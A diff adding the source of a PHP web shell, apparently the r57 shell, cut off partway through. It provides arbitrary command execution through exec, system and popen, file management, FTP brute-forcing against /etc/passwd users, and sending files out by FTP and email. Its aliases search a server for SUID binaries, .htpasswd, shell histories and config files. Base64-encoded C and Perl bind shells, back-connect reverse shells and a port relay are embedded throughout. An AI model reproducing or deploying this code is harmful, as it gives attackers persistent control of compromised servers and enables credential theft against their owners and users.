+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'FTP-server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without archivation',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu) login for password',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>?</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users'])) 
+ { 
+ if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else 
+  { 
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); 
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ { 
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); } 
+ if(empty($os)){ $os ="-"; $unix=1; } 
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die(); 
+  }                                                          
+if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;  
+  foreach ($rows as $string)
+   {
+        $user = @explode(":",$string);
+        if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users;        
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function fe($l,$n)
+{
+$text['ru']  = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????');
+$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');    
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
+return null;
+}
+function mr($l,$n)
+{
+$text['ru']  = array('?? ??????? ????????? ??????','?????? ??????????');
+$text['eng'] = array('Can\'t send mail','Mail sent');   
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }      
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+        $handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
